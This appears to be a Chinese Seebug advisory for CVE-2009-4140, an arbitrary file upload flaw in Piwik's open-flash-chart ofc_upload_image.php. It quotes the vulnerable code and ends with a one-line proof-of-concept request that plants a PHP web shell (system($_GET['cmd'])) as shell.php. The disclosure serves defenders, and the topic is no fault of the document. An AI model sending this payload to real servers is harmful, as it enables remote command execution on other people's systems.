Piwik ofc_upload_image.php远程PHP代码执行漏洞

2009-12-25T00:00:00
ID SSV:15141
Type seebug
Reporter Root
Modified 2009-12-25T00:00:00

Description

BUGTRAQ ID: 37314 CVE(CAN) ID: CVE-2009-4140

Piwik是一款利用Php+MySQL技术构建的开源网页访问统计系统。

Piwik中使用了open-flash-chart模块执行制表操作,该模块没有正确的过滤提交给ofc_upload_image.php文件的name和HTTP_RAW_POST_DATA参数便用于创建文件:

<? $default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); $destination = $default_path . basename( $_GET[ 'name' ] ); // This should be sanitised before use.

echo 'Saving your image to: '. $destination; // and it tells us where it's saving it to, sigh.

$jfh = fopen($destination, 'w') or die(&quot;can't open file&quot;); // The vulnerable code is right here.
fwrite($jfh, $HTTP_RAW_POST_DATA);               // and here, &lt;?phpinfo();?&gt;, &lt;?system($_GET['cmd']);?&gt;
fclose($jfh);

?>

在启用了register_globals的情况下,通过认证的远程攻击者可以通过上传带有PHP扩展名的文件并通过直接请求tmp-upload-images/来访问该文件导致执行任意代码。

Piwik 0.2.35 - 0.4.3 厂商补丁:

Piwik

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/

                                        
                                            
                                                ./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&amp;HTTP_RAW_POST_DATA=&lt;?system($_GET['cmd']);?&gt;